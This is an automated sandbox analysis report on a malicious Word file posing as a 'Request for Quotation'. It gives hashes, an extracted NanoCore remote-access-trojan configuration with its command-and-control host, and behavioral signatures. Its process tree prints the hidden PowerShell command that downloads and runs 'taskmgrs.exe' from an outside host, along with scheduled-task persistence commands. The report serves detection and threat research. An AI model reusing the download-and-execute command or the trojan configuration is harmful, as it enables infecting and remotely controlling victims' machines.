Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
20-04-2021 07:17
Static task
static1
Behavioral task
behavioral1
Sample
180421 PDA Request for Quotation.doc
Resource
win7v20210410
Behavioral task
behavioral2
Sample
180421 PDA Request for Quotation.doc
Resource
win10v20210410
General
-
Target
180421 PDA Request for Quotation.doc
-
Size
295KB
-
MD5
dbecba4a6211aba561e0d36f9db4b1d2
-
SHA1
f808acedb937fcf07cd2b2c801a84cf290272b65
-
SHA256
153d0278268d1ba4248fcc47b93d6098c023c22ae0148e570e5f97810ae1dc4a
-
SHA512
a3217a7c1b41cbf262c3b31e296244abb602a5fede6b402efde3f949df65ac29fea3a316b1ef7ebd6e6c121ff0a959129b62569261a15db895500e81fe0d693e
Malware Config
Extracted
httP://twart.myfirewall.org/taskmgrs.exe
Extracted
nanocore
1.2.2.0
cloudhost.myfirewall.org:5456
526138e5-5494-46e7-98ba-5b4a5e1d307b
-
activate_away_mode
true
-
backup_connection_host
cloudhost.myfirewall.org
-
backup_dns_server
cloudhost.myfirewall.org
-
buffer_size
65535
-
build_time
2021-01-30T00:19:04.422535736Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
5456
-
default_group
saviour
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
526138e5-5494-46e7-98ba-5b4a5e1d307b
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
cloudhost.myfirewall.org
-
primary_dns_server
cloudhost.myfirewall.org
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exepowershell.exepowershell.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 836 788 powershell.exe WINWORD.EXE Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 964 788 powershell.exe WINWORD.EXE Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1448 788 powershell.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 1448 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
taskmgrs.exetaskmgrs.exepid process 1852 taskmgrs.exe 812 taskmgrs.exe -
Loads dropped DLL 1 IoCs
Processes:
powershell.exepid process 1448 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
taskmgrs.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\LAN Host = "C:\\Program Files (x86)\\LAN Host\\lanhost.exe" taskmgrs.exe -
Processes:
taskmgrs.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskmgrs.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
taskmgrs.exedescription pid process target process PID 1852 set thread context of 812 1852 taskmgrs.exe taskmgrs.exe -
Drops file in Program Files directory 2 IoCs
Processes:
taskmgrs.exedescription ioc process File created C:\Program Files (x86)\LAN Host\lanhost.exe taskmgrs.exe File opened for modification C:\Program Files (x86)\LAN Host\lanhost.exe taskmgrs.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1300 schtasks.exe 1460 schtasks.exe -
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 788 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exetaskmgrs.exepid process 964 powershell.exe 836 powershell.exe 1448 powershell.exe 964 powershell.exe 1448 powershell.exe 836 powershell.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe 812 taskmgrs.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskmgrs.exepid process 812 taskmgrs.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exetaskmgrs.exedescription pid process Token: SeDebugPrivilege 836 powershell.exe Token: SeDebugPrivilege 964 powershell.exe Token: SeDebugPrivilege 1448 powershell.exe Token: SeDebugPrivilege 812 taskmgrs.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
WINWORD.EXEpid process 788 WINWORD.EXE 788 WINWORD.EXE 788 WINWORD.EXE 788 WINWORD.EXE -
Suspicious use of WriteProcessMemory 37 IoCs
Processes:
WINWORD.EXEpowershell.exetaskmgrs.exetaskmgrs.exedescription pid process target process PID 788 wrote to memory of 836 788 WINWORD.EXE powershell.exe PID 788 wrote to memory of 836 788 WINWORD.EXE powershell.exe PID 788 wrote to memory of 836 788 WINWORD.EXE powershell.exe PID 788 wrote to memory of 836 788 WINWORD.EXE powershell.exe PID 788 wrote to memory of 964 788 WINWORD.EXE powershell.exe PID 788 wrote to memory of 964 788 WINWORD.EXE powershell.exe PID 788 wrote to memory of 964 788 WINWORD.EXE powershell.exe PID 788 wrote to memory of 964 788 WINWORD.EXE powershell.exe PID 788 wrote to memory of 1448 788 WINWORD.EXE powershell.exe PID 788 wrote to memory of 1448 788 WINWORD.EXE powershell.exe PID 788 wrote to memory of 1448 788 WINWORD.EXE powershell.exe PID 788 wrote to memory of 1448 788 WINWORD.EXE powershell.exe PID 1448 wrote to memory of 1852 1448 powershell.exe taskmgrs.exe PID 1448 wrote to memory of 1852 1448 powershell.exe taskmgrs.exe PID 1448 wrote to memory of 1852 1448 powershell.exe taskmgrs.exe PID 1448 wrote to memory of 1852 1448 powershell.exe taskmgrs.exe PID 788 wrote to memory of 1544 788 WINWORD.EXE splwow64.exe PID 788 wrote to memory of 1544 788 WINWORD.EXE splwow64.exe PID 788 wrote to memory of 1544 788 WINWORD.EXE splwow64.exe PID 788 wrote to memory of 1544 788 WINWORD.EXE splwow64.exe PID 1852 wrote to memory of 812 1852 taskmgrs.exe taskmgrs.exe PID 1852 wrote to memory of 812 1852 taskmgrs.exe taskmgrs.exe PID 1852 wrote to memory of 812 1852 taskmgrs.exe taskmgrs.exe PID 1852 wrote to memory of 812 1852 taskmgrs.exe taskmgrs.exe PID 1852 wrote to memory of 812 1852 taskmgrs.exe taskmgrs.exe PID 1852 wrote to memory of 812 1852 taskmgrs.exe taskmgrs.exe PID 1852 wrote to memory of 812 1852 taskmgrs.exe taskmgrs.exe PID 1852 wrote to memory of 812 1852 taskmgrs.exe taskmgrs.exe PID 1852 wrote to memory of 812 1852 taskmgrs.exe taskmgrs.exe PID 812 wrote to memory of 1300 812 taskmgrs.exe schtasks.exe PID 812 wrote to memory of 1300 812 taskmgrs.exe schtasks.exe PID 812 wrote to memory of 1300 812 taskmgrs.exe schtasks.exe PID 812 wrote to memory of 1300 812 taskmgrs.exe schtasks.exe PID 812 wrote to memory of 1460 812 taskmgrs.exe schtasks.exe PID 812 wrote to memory of 1460 812 taskmgrs.exe schtasks.exe PID 812 wrote to memory of 1460 812 taskmgrs.exe schtasks.exe PID 812 wrote to memory of 1460 812 taskmgrs.exe schtasks.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\180421 PDA Request for Quotation.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://twart.myfirewall.org/taskmgrs.exe','C:\Users\Admin\AppData\Roaming\taskmgrs.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\taskmgrs.exe'"2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://twart.myfirewall.org/taskmgrs.exe','C:\Users\Admin\AppData\Roaming\taskmgrs.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\taskmgrs.exe'"2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:964
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://twart.myfirewall.org/taskmgrs.exe','C:\Users\Admin\AppData\Roaming\taskmgrs.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\taskmgrs.exe'"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Users\Admin\AppData\Roaming\taskmgrs.exe"C:\Users\Admin\AppData\Roaming\taskmgrs.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Users\Admin\AppData\Roaming\taskmgrs.exe"{path}"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "LAN Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmpCF41.tmp"5⤵
- Creates scheduled task(s)
PID:1300
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "LAN Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpD02C.tmp"5⤵
- Creates scheduled task(s)
PID:1460
-
-
-
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1544
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5
MD502ff38ac870de39782aeee04d7b48231
SHA10390d39fa216c9b0ecdb38238304e518fb2b5095
SHA256fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876
SHA51224a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248ba
MD575a8da7754349b38d64c87c938545b1b
SHA15c28c257d51f1c1587e29164cc03ea880c21b417
SHA256bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96
SHA512798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370
MD5be4d72095faf84233ac17b94744f7084
SHA1cc78ce5b9c57573bd214a8f423ee622b00ebb1ec
SHA256b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc
SHA51243856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295b
MD5df44874327d79bd75e4264cb8dc01811
SHA11396b06debed65ea93c24998d244edebd3c0209d
SHA25655de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181
SHA51295dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eeb
MD5597009ea0430a463753e0f5b1d1a249e
SHA14e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62
SHA2563fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d
SHA5125d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598
MD55e3c7184a75d42dda1a83606a45001d8
SHA194ca15637721d88f30eb4b6220b805c5be0360ed
SHA2568278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59
SHA512fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c
MD5a725bb9fafcf91f3c6b7861a2bde6db2
SHA18bb5b83f3cc37ff1e5ea4f02acae38e72364c114
SHA25651651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431
SHA5121c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c
MD5a725bb9fafcf91f3c6b7861a2bde6db2
SHA18bb5b83f3cc37ff1e5ea4f02acae38e72364c114
SHA25651651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431
SHA5121c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9
MD5b6d38f250ccc9003dd70efd3b778117f
SHA1d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a
SHA2564de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265
SHA51267d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5571461dabf827d74a5eecd1fd69f01b3
SHA1a8ebf3398dc50519a4d320b2151bbf55750cca20
SHA256d9c7c7b72a09d66321b4ac4fa3a05d3a10fdf7d3377766c7a87099fe6ac0f3ec
SHA512113ba6cfd01307b070f0b211a9b3e91055c725f80afeee8e0ddf9d9cad70d93116cc3dcb19ef57769dd044e19d9f80fd1f05efebafe60ef401a7448944ab8df0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD59044fe2499c8775154e9da5e10beb869
SHA105f0f1a3366a27b1d4c559740fc0c830005232b2
SHA25698e647162afeb4d0893c90abffe280c5ac7ed6beb2bf128f299df3c69d3d2be4
SHA51245631aadae917606b3e0951dfc3aecef98f203e135f4fcb4ebf1b685fa5a45bef30ba4c72a17a4551508443d6a7ca4f1c829c2021d4c31493af920a504e5e55f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5997491c62959e4e8d2c83ecd00337f98
SHA1d86897e83cce14a543576def0652bad32540c3dd
SHA256b1ce710e8d451153984ee9cb45ca157b8880b320243eaf95f87d45f09b04e639
SHA512762bba6437952abe800fbdc6c77e634b92ccffe3f5567721062b99bd7f9ceca0fcfef37f20f857089da882cba2290f6917f5fc2ab40835f9f4a04e0fb8955445
-
MD5
7b1135bfca0a22d7a6314f3f71de24c4
SHA10a08d3cd94d878153ec57108c03200ace88245b3
SHA256b194ff0daf8921a3bd068453afbc088e8e4f2c05aade69b9e40e118dd2fadcb7
SHA51231629a6f9501bf3fe5a21323b40f648215ba8696c421747e0cd6828617f44c2c593236cbf6574946fc1e2f89287196796140b10ca34cfe3ead27c5e880ede1c4
-
MD5
54865f98871478b2b88b7f8aa6100915
SHA16f8667f1ce25cebee2a7b460668736ff6bcfac54
SHA256287f7b4372926ff59bb9a14bdfc00ad63f92af8efdb2e14f6f6baf31878fd44e
SHA512caba0bd0cb0eda0710291f9754cfdef1a3d8fdb8b6d07f5d3e4d1e7b09c87f37032287ddef0a75485d6e685afa3510ee64453662e6c8d223ae171b392b58e493
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD58e9b7d7db323b06b9c71fc9fa65268fd
SHA12a6d0ff528dd3ba70bcca2ef98012fd49c9492b9
SHA2563945169bb3ea1f2c01023b2fc4e3ff0a6b8e56fa4ed0c90692d2508e53fcbb93
SHA512e2b21131acff4a500e7160d4bb0b5cb6504fc0e8d5f96b9014bd1d36de409393db2bb682f7141f79acc7173526cdc963737ce71f63b5cf69958b045754f3a28d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD58e9b7d7db323b06b9c71fc9fa65268fd
SHA12a6d0ff528dd3ba70bcca2ef98012fd49c9492b9
SHA2563945169bb3ea1f2c01023b2fc4e3ff0a6b8e56fa4ed0c90692d2508e53fcbb93
SHA512e2b21131acff4a500e7160d4bb0b5cb6504fc0e8d5f96b9014bd1d36de409393db2bb682f7141f79acc7173526cdc963737ce71f63b5cf69958b045754f3a28d
-
MD5
5afcfc062ab07a34ed4ec450ef9226aa
SHA15c47470dd26e4f4c5b4330774bb86219599259c4
SHA2564747e07c7166af92d57c9f2db0fd1bd0352df581f1bd92e53367bdc1d1d5df5b
SHA5124edba0495375b505b12c8f26f6cbc45b08ec602a50045a538dc48905dd562c5a7fee5fe4d61547d4c2da9379f93381db590aa38ab45be9bdabfb7fae54b6f116
-
MD5
d5d56d33b8698818602da14aa0754909
SHA183711a00aa7b1cc874915d5e7221eff8ac008dcf
SHA256fc8d2060f52b693d1745bac54a0943292519d643917590d4ded54a9cbd96ea7a
SHA512a6820144a0b07370226f1d2f5a4f0478560a15482f6afe0920eb30a9826bb080b1c824dfdc60811f45afac2bcfbd61591c8f866d7caf67aeffc12124219a4829
-
MD5
d5d56d33b8698818602da14aa0754909
SHA183711a00aa7b1cc874915d5e7221eff8ac008dcf
SHA256fc8d2060f52b693d1745bac54a0943292519d643917590d4ded54a9cbd96ea7a
SHA512a6820144a0b07370226f1d2f5a4f0478560a15482f6afe0920eb30a9826bb080b1c824dfdc60811f45afac2bcfbd61591c8f866d7caf67aeffc12124219a4829
-
MD5
d5d56d33b8698818602da14aa0754909
SHA183711a00aa7b1cc874915d5e7221eff8ac008dcf
SHA256fc8d2060f52b693d1745bac54a0943292519d643917590d4ded54a9cbd96ea7a
SHA512a6820144a0b07370226f1d2f5a4f0478560a15482f6afe0920eb30a9826bb080b1c824dfdc60811f45afac2bcfbd61591c8f866d7caf67aeffc12124219a4829
-
MD5
d5d56d33b8698818602da14aa0754909
SHA183711a00aa7b1cc874915d5e7221eff8ac008dcf
SHA256fc8d2060f52b693d1745bac54a0943292519d643917590d4ded54a9cbd96ea7a
SHA512a6820144a0b07370226f1d2f5a4f0478560a15482f6afe0920eb30a9826bb080b1c824dfdc60811f45afac2bcfbd61591c8f866d7caf67aeffc12124219a4829